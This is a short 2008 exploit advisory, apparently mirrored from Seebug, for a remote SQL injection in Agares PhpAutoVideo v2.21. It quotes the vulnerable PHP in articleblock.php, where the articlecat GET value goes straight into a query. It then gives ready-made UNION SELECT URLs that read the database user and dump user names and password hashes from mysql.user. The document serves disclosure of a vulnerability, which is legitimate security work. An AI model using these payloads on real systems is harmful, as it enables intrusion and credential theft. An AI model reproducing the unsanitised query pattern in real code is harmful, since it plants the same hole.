-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=- Agares PhpAutoVideo v2.21 Remote SQL Injection Vulnerability -=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=- D.O.M TEAM 2008 we are: ka0x, an0de, xarnuz bug found by ka0x concat: ka0x01[at]gmail.com> #from spain vulnerability in /includes/articleblock.php vuln code: ------------------------------------------------------------------ $cat = $_GET['articlecat']; if ($cat == NULL){ $sql = "SELECT * FROM amcms_articles;"; } else{ $sql = "SELECT * FROM amcms_articles WHERE catid=$cat;"; } ------------------------------------------------------------------ Your user needs to be root@localhost or administrator mysql, check: http://[host]/includes/articleblock.php?articlecat=-1/**/union/**/select/**/user()/* user and password from mysql.user: http://[host]/phpautovideo/includes/articleblock.php?articlecat=-1/**/union/**/select/**/concat(user,0x203a3a20,password)/**/from/**/mysql.user/*
※本站提供的任何内容、代码与服务仅供学习,请勿用于非法用途,否则后果自负
您的会员可兑换次数还剩: 次 本次兑换将消耗 1 次
续费请拨打客服热线,感谢您一直支持 Seebug!
京公网安备 11010502034610号
暂无评论